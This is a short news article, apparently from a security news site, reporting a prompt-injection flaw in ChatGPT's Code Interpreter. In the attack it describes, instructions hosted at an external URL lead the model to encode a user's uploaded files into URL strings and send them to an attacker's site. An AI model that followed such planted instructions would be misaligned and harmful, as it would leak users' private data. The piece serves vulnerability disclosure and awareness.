New ChatGPT Update Unveils Alarming Security Vulnerabilities – Is Your Data at Risk?

 

The recent enhancements to ChatGPT, such as the introduction of the Code Interpreter, have brought about heightened security issues, as per the investigations conducted by security expert Johann Rehberger and subsequently validated by Tom’s Hardware. Notably, the vulnerabilities in ChatGPT stem from its newly added file-upload feature, a component of the recent ChatGPT Plus update.
Among the various additions to ChatGPT Plus, the Code Interpreter stands out, allowing the execution of Python code and file analysis, along with DALL-E image generation. However, these updates have inadvertently exposed security flaws in the system. The Code Interpreter operates within a sandbox environment that, unfortunately, proves susceptible to prompt injection attacks.
A long-standing vulnerability in ChatGPT has been identified, wherein an attacker could manipulate the system by tricking it into executing instructions from an external URL. This manipulation prompts ChatGPT to encode uploaded files into URL-friendly strings and send the data to a potentially malicious website. 
While the success of such an attack depends on specific conditions, like the user actively pasting a malicious URL into ChatGPT, the potential risks are worrisome. This security threat could materialize through scenarios such as compromising a trusted website with a malicious prompt or utilizing social engineering tactics.

[…]
Content was cut in order to protect the source.Please visit the source for the rest of the article.

This article has been indexed from CySecurity News – Latest Information Security and Hacking Incidents

Read the original article: